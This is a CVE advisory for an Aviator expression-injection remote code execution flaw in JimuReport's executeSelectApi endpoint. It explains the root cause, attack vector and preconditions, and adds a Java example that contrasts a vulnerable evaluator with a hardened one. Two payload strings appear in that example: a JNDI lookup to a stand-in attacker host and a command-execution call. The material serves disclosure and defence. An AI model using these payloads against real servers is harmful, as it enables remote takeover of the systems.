CVE-2026-36418
Description
JimuReport versions 2.3.4 and below are vulnerable to remote code execution due to improper handling of Aviator expressions. The /jmreport/executeSelectApi endpoint passes user-supplied input directly to the Aviator expression engine without adequate validation, allowing attackers to execute arbitrary code.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
- JimuReport, version range: <=2.3.4
Patches
Vulnerability mechanics
Root cause
"User-supplied input in the `paramValue` parameter is passed directly to the Aviator expression engine without validation, enabling arbitrary expression injection."
Attack vector
An attacker sends a crafted POST request to `/jmreport/executeSelectApi` with a `paramArray` JSON containing a `paramValue` that starts with `=`. The backend strips nothing and compiles the value as an Aviator expression without adequate validation, so the attacker controls what the engine executes [ref_id=1]. The researcher demonstrates two payloads: one using JNDI injection (`InitialContext.doLookup`, which makes the server perform an attacker-controlled lookup), and another calling the hutool-core library's `RuntimeUtil.execForStr` to run a system command such as `calc` as a harmless proof of execution [ref_id=1].
Affected code
The vulnerability resides in the `/jmreport/executeSelectApi` endpoint of JimuReport, specifically in `org.jeecg.modules.jmreport.desreport.b.a`. The `paramValue` parameter is extracted from user-supplied JSON, passed through `ExpressUtil.a()`, and then compiled and executed by the Aviator expression engine via `exp.execute()` [ref_id=1].
What the fix does
The advisory does not include a published patch. The root cause is that the `ExpressUtil.a()` method compiles and executes user-controlled input as an Aviator expression when the input starts with `=`, with no sanitization or allowlist of permitted functions [ref_id=1]. A proper fix would have to restrict what the engine will accept (for example, disabling class access, object instantiation and static method invocation, and allowlisting the identifiers an expression may reference), or stop evaluating user-supplied values as expressions entirely.
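The following is an added example, not JimuReport's code or a published fix: it places the vulnerable shape described above (anything starting with `=` is compiled on the global evaluator) beside a hardened evaluator built on the AviatorScript 5.x options `FEATURE_SET`, `ALLOWED_CLASS_SET` and `ASSIGNABLE_ALLOWED_CLASS_SET`, plus an identifier allowlist checked against the report's own parameter map. The class name `ParamValueDemo`, the method names and the payload strings are constructed for illustration; the two hostile strings only mirror the shape of the advisory's payloads and are never run on the vulnerable path here.

```java
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;

import com.googlecode.aviator.AviatorEvaluator;
import com.googlecode.aviator.AviatorEvaluatorInstance;
import com.googlecode.aviator.Expression;
import com.googlecode.aviator.Feature;
import com.googlecode.aviator.Options;
import com.googlecode.aviator.exception.ExpressionRuntimeException;

public class ParamValueDemo {

    // Constructed inputs in the shape the advisory describes: paramValue starting with '='.
    static final String BENIGN     = "=price * qty";
    static final String JNDI_STYLE = "=javax.naming.InitialContext.doLookup('ldap://attacker.example/x')";
    static final String EXEC_STYLE = "=cn.hutool.core.util.RuntimeUtil.execForStr('calc')";

    /** Vulnerable shape: anything after '=' is compiled and executed on the global evaluator. */
    static Object evalVulnerable(String paramValue, Map<String, Object> env) {
        if (paramValue != null && paramValue.startsWith("=")) {
            Expression exp = AviatorEvaluator.compile(paramValue.substring(1));
            return exp.execute(env);
        }
        return paramValue;
    }

    /** Dedicated evaluator with syntax features and class access switched off (assumed AviatorScript 5.x API). */
    static final AviatorEvaluatorInstance SAFE = buildSafeEvaluator();

    static AviatorEvaluatorInstance buildSafeEvaluator() {
        AviatorEvaluatorInstance inst = AviatorEvaluator.newInstance();
        // Empty feature set: no NewInstance, StaticMethods, StaticFields, Module, Lambda, Assignment, loops.
        inst.setOption(Options.FEATURE_SET, Feature.asSet());
        // Empty (not null) class sets deny every class; null is the permissive default.
        inst.setOption(Options.ALLOWED_CLASS_SET, Collections.emptySet());
        inst.setOption(Options.ASSIGNABLE_ALLOWED_CLASS_SET, Collections.emptySet());
        return inst;
    }

    /** Hardened shape: restricted engine plus an allowlist of identifiers taken from the parameter map. */
    static Object evalHardened(String paramValue, Map<String, Object> env) {
        if (paramValue == null || !paramValue.startsWith("=")) {
            return paramValue; // plain literal, never reaches the engine
        }
        try {
            Expression exp = SAFE.compile(paramValue.substring(1));
            for (String name : exp.getVariableNames()) {
                if (!env.containsKey(name)) {
                    throw new IllegalArgumentException("unknown identifier in expression: " + name);
                }
            }
            return exp.execute(env);
        } catch (ExpressionRuntimeException e) {
            throw new IllegalArgumentException("expression rejected: " + e.getMessage(), e);
        }
    }

    public static void main(String[] args) {
        Map<String, Object> env = new HashMap<>();
        env.put("price", 3);
        env.put("qty", 4);

        // The benign report parameter works on both paths.
        System.out.println("vulnerable, benign: " + evalVulnerable(BENIGN, env));
        System.out.println("hardened,   benign: " + evalHardened(BENIGN, env));

        // Hostile inputs are rejected by the hardened path; they are deliberately not sent to evalVulnerable.
        for (String hostile : new String[] { JNDI_STYLE, EXEC_STYLE }) {
            try {
                evalHardened(hostile, env);
                System.out.println("UNEXPECTED: accepted " + hostile);
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```

The identifier check is defense in depth: with static method invocation disabled the engine already refuses dotted class references, but a report should also not be able to read arbitrary evaluator variables that were never declared as parameters.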
Preconditions
- network: The attacker must have network access to the `/jmreport/executeSelectApi` endpoint.
- input: The attacker must supply a `paramValue` that begins with `=` to satisfy the expression-triggering condition.
Generated on Jun 18, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References (1)
News mentions (0): No linked articles in our index yet.